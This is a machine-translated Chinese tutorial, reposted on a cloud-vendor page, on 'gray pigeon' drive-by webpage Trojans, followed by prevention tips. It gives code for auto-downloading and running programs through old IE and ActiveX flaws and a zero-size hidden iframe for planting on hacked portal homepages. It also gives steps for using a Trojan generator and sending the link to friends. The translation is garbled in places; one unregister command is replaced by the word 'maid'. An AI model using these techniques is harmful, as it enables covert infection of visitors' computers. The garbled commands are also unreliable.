The principle, production, and prevention of "gray pigeon" webpage Trojans (figure)

Source: Internet
Author: User
Tags microsoft website

Everything has two sides. The webpage Trojan creation technique introduced in this article is intended to strengthen everyone's awareness of prevention, rather than thinking about "infected creatures ". We hope to provide some help to you and create a secure Internet access environment.

If you visit the xxx website (a portal website in China), you will have a gray pigeon Trojan. This is what a hacker told me. Open the home page of the website. After checking, I am indeed in the dark. How can this problem be achieved? He said that He intruded into the server of the website and hung a webpage Trojan on the website homepage. Some security experts often say that they should not open the website sent by strangers. Why? Because the website is likely to be a webpage Trojan specially crafted by malicious users.

The above are only two types of webpage Trojans. In fact, webpage Trojans can also be mounted on multimedia files (RM, RMVB, WMV, WMA, Flash), emails, forums, and other files and occasions. How can users prevent webpage Trojans? Next, let's start with the principle of webpage Trojan attack.

I. webpage Trojan attack principles

First of all, it is clear that a webpage Trojan is actually an HTML webpage. Unlike other webpages, this webpage is carefully crafted by hackers. Once a user accesses this webpage, it will be a Trojan. Why are they carefully crafted by hackers? Because the scripts embedded in this web page properly exploit the vulnerability of IE browser, let IE automatically download the Trojan horse that hackers put on the network in the background and run (install) the Trojan horse. That is to say, this web page can download Trojans to the local computer and run (install) the Trojans downloaded to the local computer, the whole process is running in the background, once the user opens this web page, the download process and run (install) the process starts automatically.

Some may say that when a Web page is opened, can the IE browser automatically download and run the program? If IE can download and run programs without fear, the world will not be messy. In fact, for security purposes, ie prohibits automatic download of programs, especially running programs. However, there are some known and unknown vulnerabilities in IE, web Trojans use these vulnerabilities to obtain permissions to download and run programs. The following is an early vulnerability in IE browser to illustrate these two problems.

 ⒈ Automatically downloads the program

<Script language = "icyfoxlovelace" src = ""> </SCRIPT>

Tip: Code Description

A. The property of "src" in the Code is the network address of the program. In this example.

B. you can also upload the trojan program to the free home page, but most of the free space is not allowed to upload the exe file for security reasons. hackers may change the extension exe to bat or com, in this way, they can upload these programs to the server.

Insert this code into the source code of the webpage </BODY>... </BODY> (1), and then open IE6 with no patch. Next, open the Temporary directory of IE <Temporary Internet Files>. You will find that there is a file named 1.exe in the folder. That is to say, this webpage has automatically downloaded the gray pigeon Trojan I placed on the Web server.

Figure 1 webpage Trojan example

Related links:
The anti-virus myth is broken: Mac OS X first encounters a Trojan
The new Trojan kidnapped user files and demanded a ransom of $300.
Drive away webpage Trojans | large-scale gray pigeon attacks on January 1, April 5

  TIPS:Gray pigeon Trojan

Why must we use a gray pigeon Trojan? Because the gray pigeon is a bounce Trojan, it can bypass most firewalls such as Skynet to intercept the trojan. After the trojan, the server can actively connect to the control terminal (client), that is, once the control end is connected to the Internet, the control end will automatically go online (2 ).

Figure 2 example of gray Pigeon Control short (Khan! Another major drug lord :))

  ⒉ Automatically runs the program

<Script language = "javascript" type = "text/javascript"> var shell = new ActiveXObject ("shell. application "); shell. namespace ("c: \ Windows \\"). items (). item ("Notepad.exe "). invokeverb (); </SCRIPT>

Insert this code into the source code of the webpage </BODY>... </BODY>, and then use IE to open the webpage. You will find that this code can automatically open notepad in IE6 without any patches.

This Code uses the shell.applicationcontrol, which allows the website administrator to execute the permission, replace the notepad.exe (Notepad) program in the code, and use it to automatically run any program on the local computer.

Through the above code, we can see that using the IE vulnerability, that is to say, inserting the appropriate code in the webpage, IE can automatically download and run the program. However, once the IE patch is installed, these codes will be ineffective. In addition, these codes need to run and download programs. webpage monitoring of some anti-virus software may regard them as viruses, hackers may use some tools to encrypt the source code of the webpage (3 ).

Figure 3 encrypted webpage code

Related links:
The anti-virus myth is broken: Mac OS X first encounters a Trojan
The new Trojan kidnapped user files and demanded a ransom of $300.
Drive away webpage Trojans | large-scale gray pigeon attacks on January 1, April 5

Ii. Basic usage of webpage Trojans

After understanding the principles of webpage Trojan attacks, we can create our own webpage Trojan, but you need to write and exploit the code based on the IE vulnerability. In fact, many experts on the Internet have written some vulnerability exploitation code, and some have written it into VISUAL programs. Enter "webpage Trojan generator" in the search engine to search, and you will find that there are many web Trojan generators written on the Internet using various vulnerabilities of IE, most of which are VISUAL programs, as long as you have a Trojan (the trojan must be placed on the Network), you can use these generators to generate a webpage immediately. The webpage is a webpage Trojan, As long as someone else opens the webpage, this page automatically downloads and runs (installs) The Trojan.

I have downloaded a webpage Trojan generator on my computer. Let's see how to generate a webpage Trojan and let others have it.

Step 1: Start the webpage Trojan generator, as shown in 4. Enter the network address of the Trojan in the text box, and click Generate ".

Figure 4 webpage Trojan Generator

Step 2: A webpage file is generated in the installation folder of the webpage Trojan generator, which is the webpage Trojan we generated in the previous step. Upload the file to your Web server or free primary space.

Now, send the address (website) of the above Web page on the server to your friends via QQ. Once he accesses the web page, this web page will automatically download and run your Trojan on the network on his computer.

Now you should understand the true meaning of the phrase "Don't open the network address from strangers" suggested by the security experts! In fact, even if no one opens a website from a stranger, there are still some people who "fill in the lights and find their own dead ends", because if the Internet is large, there will always be some people who will visit these websites intentionally or unintentionally, and some webpage Trojans will also be hung on some well-known websites (based on the access volume of well-known websites, you can calculate it, how many people are Trojans every day !).

  TIPS:You may not have expected to watch a movie or view or reply to a post on a forum. In fact, webpage Trojans can also be mounted on multimedia files, e-mails, forums, and CHM e-books, once a user watches a movie, views or previews an email (mainly spam sent by an email consumer), participates in a post, and opens an e-book, the user will be on a webpage Trojan.

Here we will only introduce how hackers can mount webpage trojans on well-known websites. The following code: iframe src = "" width = "0" height = "0" frameborder = "0"> </iframe>

Related links:
The anti-virus myth is broken: Mac OS X first encounters a Trojan
The new Trojan kidnapped user files and demanded a ransom of $300.
Drive away webpage Trojans | large-scale gray pigeon attacks on January 1, April 5

  TIPS:The "src" attribute " the network that is uploaded to the webpage Trojan on the server.

Insert this code into the source code of a portal homepage </BODY>... </BODY> On the surface, the homepage of the portal does not change after the portal is inserted. However, all the people who access the homepage of the portal will be Trojans. Why? This is because the <iframe> tag in this Code implicitly "contains" webpage Trojans "in the webpage that inserts the code.

<Iframe> it is also called a floating frame tag. It can embed an HTML webpage into another webpage to achieve the "picture-in-picture" effect (5 ), the embedded webpage can control the width, height, border size, and whether a scroll bar appears. In the previous code, because the width, height, and frameborder are all set to "0", the code above is inserted into the homepage of the portal, the homepage of the website will not change. However, because the embedded webpage has actually opened, the script for downloading Trojans and running trojans on the webpage will still be executed as the portal homepage opens.

Figure 5 iframe tag example

Someone may ask how to insert the above Code into the source code of the portal homepage? This is a good question. I am not easy to learn and cannot access their server to modify webpages. However, if hackers discover vulnerabilities on these servers and obtain webshell permissions, modifying their webpage is as easy as creating a webpage locally.

Someone asked, is it easy to get the webshell permission on the server? If you pay more attention to network security, you will find that this website is often hacked and news about the modification of the website's home page is reported.

Someone asked, "portal servers have almost no vulnerabilities to find. There are many vulnerabilities on personal servers. Can you access them? I am not a hacker. According to the laws of the People's Republic of China, it is illegal to intrude into and tamper with information on others' servers. I hope everyone can jointly maintain network security.

In the past, when you opened some famous websites on the Internet, anti-virus software also reported alerts. Now you understand the truth. Some people post on these websites and read this article. I hope that you can think about it for those webmasters.

Related links:
The anti-virus myth is broken: Mac OS X first encounters a Trojan
The new Trojan kidnapped user files and demanded a ransom of $300.
Drive away webpage Trojans | large-scale gray pigeon attacks on January 1, April 5

3. webpage Trojan protection policies

It is far from enough to prevent webpage Trojans only by anti-virus software and firewall, because once hackers use a personal version of the Trojan with a bounce port (some anti-virus software that cannot be identified by personal disassembles ), therefore, anti-virus software and firewall are helpless. Therefore, the prevention of webpage Trojans should begin with its principle and be prevented from the root.

  (I) install security patches in real time

Webpage Trojans are spread by exploiting the IE vulnerability. Let's take the webpage Trojan generated by the ice Fox prodigal son (using the webpage Trojan generated by the "ice Fox prodigal son webpage Trojan generator, this webpage can bypass the security settings of IE. When a user connects to this webpage, it can download a Trojan and run (install) it in the background without the knowledge of common users. Therefore, downloading and installing the latest security patches on the Microsoft website is an effective way to prevent web Trojans.

  (Ii) renaming or uninstalling (unregistering) the least secure ActiveXObject (ie plug-in)

In the system, some ActiveXObject will run the EXE program, such as the Shell in the "automatically run program" code in this article. application Control. Once these controls have the execution permission on the webpage, they will become a "hot ground" for running Trojans ", therefore, renaming or uninstalling these controls can prevent web Trojans that use these controls. However, ActiveXObject occurs for applications, rather than attacks. All controls are useful. Therefore, before renaming or detaching a control, you must confirm that this control is not needed, or even if it is uninstalled, It is not general.

Uninstall (unregister) ActiveXObject

Step 1: click "run" on the "Start" menu and enter the "CMD" command to open the Command Prompt window.

Step 2: Enter "maid" in the command prompt, and press enter to uninstall the Shell. application Control.

If you want to continue using this configuration, you can enter the "regsvr32.exe shell32.dll/I/s" command in the Command Prompt window to reinstall (Register) them ). In the preceding command: “regsvr32.exe is the command for registering or unregistering OLE objects or controls. [/u] is the anti-registration parameter, and [/s] is the quiet mode parameter, [/I] is the installation parameter.

Lifecycle name ActiveXObject

It should be noted that when you change the name of a control, the control name and CLSID (Class ID) must be changed and completely changed. The following describes how to use Shell. application as an example.

Step 1: Open the Registry Editor and find "Shell. application ". You can use this method to find two registry items: "{13709620-C279-11CE-A49E-444553540000}" and "Shell. application ".

Step 2: Change {13709620-C279-11CE-A49E-444553540000} to {13709620-C279-11CE-A49E-444553540001}. Do not repeat it with other CLSID in the system.

Step 3: Change "Shell. application" to "Shell. application_xxx ". When you use this control later, you can use this name to call the control normally.

Related links:
The anti-virus myth is broken: Mac OS X first encounters a Trojan
The new Trojan kidnapped user files and demanded a ransom of $300.
Drive away webpage Trojans | large-scale gray pigeon attacks on January 1, April 5

  (3) improve the security level of IE, and disable scripts and ActiveX controls.

According to my test, the webpage Trojan generated by the "webpage Trojan Professional Edition builder" of the ice Fox prodigal son only needs to increase the security level of IE or disable the script. We can see from the Trojan attack principle that webpage Trojans use some vulnerabilities in the IE Script and ActiveX Control to download and run Trojans. If we disable scripts and ActiveX controls, this prevents downloading and running Trojans.

  TIPS:Disabling scripts and ActiveX controls will make some web pages ineffective in terms of functions and effects, so whether to disable them depends on your own security needs.

Step 1: Select "Tools> Internet Options" on the menu bar of IE browser to open the "Internet Options" dialog box.

Step 2: On the "Security" tab, in the Internet and Local Internet areas, move the slider to the maximum (6), or click "Custom Level ", in the displayed dialog box, disable the script and ActiveX control.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.